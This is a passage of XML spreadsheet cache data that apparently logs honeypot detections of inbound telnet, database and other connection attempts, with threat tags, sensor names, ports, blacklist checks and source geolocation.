    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d00:58ff"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2410"/>
    <x v="2410"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:41:20"/>
    <d v="2025-03-11T17:58:23"/>
    <d v="2025-04-09T20:41:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:aaff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2411"/>
    <x v="2411"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:29:38"/>
    <d v="2024-12-19T17:56:56"/>
    <d v="2025-04-09T20:29:38"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45557"/>
    <s v="Vietnam Technology and Telecommunication JSC"/>
    <s v="VNTT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2013-02-27"/>
    <s v="VNTT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6711:5a04"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2412"/>
    <x v="2412"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:29:22"/>
    <d v="2025-04-09T20:27:23"/>
    <d v="2025-04-09T20:29:22"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Sikar"/>
    <s v="Neem ka Thana"/>
    <s v="1261342"/>
    <s v="NA"/>
    <s v="27.7398"/>
    <s v="75.7865"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2016-02-02"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b00:d92a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2413"/>
    <x v="2413"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:23:16"/>
    <d v="2025-04-09T20:23:16"/>
    <d v="2025-04-09T20:23:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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7:2231"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2414"/>
    <x v="2414"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:19:43"/>
    <d v="2025-03-20T21:39:33"/>
    <d v="2025-04-09T20:19:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:bb6c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2415"/>
    <x v="2415"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T20:07:51"/>
    <d v="2025-04-09T20:07:51"/>
    <d v="2025-04-09T20:07:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Khun Thian"/>
    <s v="Bang Khun Thian"/>
    <s v="1619485"/>
    <s v="NA"/>
    <s v="13.663"/>
    <s v="100.434"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656c:4a1b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2416"/>
    <x v="2416"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T19:51:08"/>
    <d v="2025-04-09T10:58:38"/>
    <d v="2025-04-09T19:51:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:f2f5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2417"/>
    <x v="2417"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T19:41:55"/>
    <d v="2024-11-28T08:17:26"/>
    <d v="2025-04-09T19:41:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:1916"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2418"/>
    <x v="2418"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T19:36:18"/>
    <d v="2025-04-06T18:53:45"/>
    <d v="2025-04-09T19:36:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>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
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:ecdf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2419"/>
    <x v="2419"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T19:10:27"/>
    <d v="2024-03-05T16:59:00"/>
    <d v="2025-04-09T19:10:27"/>
    <n v="1527"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;46447&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3644"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d368:2562"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2420"/>
    <x v="2420"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T19:08:39"/>
    <d v="2025-04-09T12:36:03"/>
    <d v="2025-04-09T19:08:39"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433&amp;&amp;445&amp;&amp;63216&amp;&amp;63271"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Jagdamba Vihar)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.6012"/>
    <s v="77.0951"/>
    <s v="136637"/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="Calcify It Services Pvt. Ltd"/>
    <s v="business"/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="2016-01-29"/>
    <s v="CIFYIT"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (175.111.181.77,64582)}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af6f:b54d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2421"/>
    <x v="2421"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:50:18"/>
    <d v="2025-04-09T18:50:18"/>
    <d v="2025-04-09T18:50:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:2033"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2422"/>
    <x v="2422"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:46:31"/>
    <d v="2025-04-09T18:46:31"/>
    <d v="2025-04-09T18:46:31"/>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RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:934e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2423"/>
    <x v="2423"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:37:31"/>
    <d v="2023-11-01T11:12:00"/>
    <d v="2025-04-09T18:37:31"/>
    <n v="267"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;22&amp;&amp;20514"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ZA"/>
    <s v="South Africa"/>
    <s v="FS"/>
    <s v="Free State"/>
    <s v="Fezile Dabi District Municipality"/>
    <s v="Sasolburg"/>
    <s v="957487"/>
    <s v="NA"/>
    <s v="-26.8136"/>
    <s v="27.8169"/>
    <s v="37611"/>
    <s v="Afrihost (Pty) Ltd"/>
    <s v="Afrihost (Pty) Ltd"/>
    <s v="hosting"/>
    <s v="Afrihost Fibre"/>
    <s v="2017-06-02"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:66b6:5587"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2424"/>
    <x v="2424"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:31:17"/>
    <d v="2025-01-21T18:16:58"/>
    <d v="2025-04-09T18:31:17"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Pocket F)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5192"/>
    <s v="77.2791"/>
    <s v="18002"/>
    <s v="World Phone Internet Services Pvt. Ltd."/>
    <s v="World Phone Internet Services Pvt. Ltd."/>
    <s v="business"/>
    <s v="World Phone  Pvt Ltd"/>
    <s v="2010-09-13"/>
    <s v="WORLDPHONE-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e66:67a4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2425"/>
    <x v="2425"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:21:59"/>
    <d v="2025-04-09T18:07:16"/>
    <d v="2025-04-09T18:21:59"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:9ebb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2426"/>
    <x v="2426"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T18:17:54"/>
    <d v="2025-04-09T18:15:09"/>
    <d v="2025-04-09T18:17:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Banjara Hills)"/>
    <s v="1269843"/>
    <s v="500034"/>
    <s v="17.4236"/>
    <s v="78.4279"/>
    <s v="17754"/>
    <s v="Excellmedia"/>
    <s v="Excell Media Pvt Ltd"/>
    <s v="residential"/>
    <s v="Excell Media Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca99:2405"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2427"/>
    <x v="2427"/>
    <s v="NA&amp;&amp;azpdegpgy3j8.stretchoid.com"/>
    <x v="0"/>
    <d v="2025-04-09T18:11:20"/>
    <d v="2025-03-28T17:02:36"/>
    <d v="2025-04-09T18:11:20"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_IMAP_HC1"/>
    <s v="6667&amp;&amp;143&amp;&amp;NA&amp;&amp;445&amp;&amp;21&amp;&amp;123"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;NA&amp;&amp;query"/>
    <s v="{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'MGLNDD_154.26.156.60_6667', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (48.216.248.211,33958)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:f8d3"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2428"/>
    <x v="2428"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T17:56:46"/>
    <d v="2025-04-09T17:56:46"/>
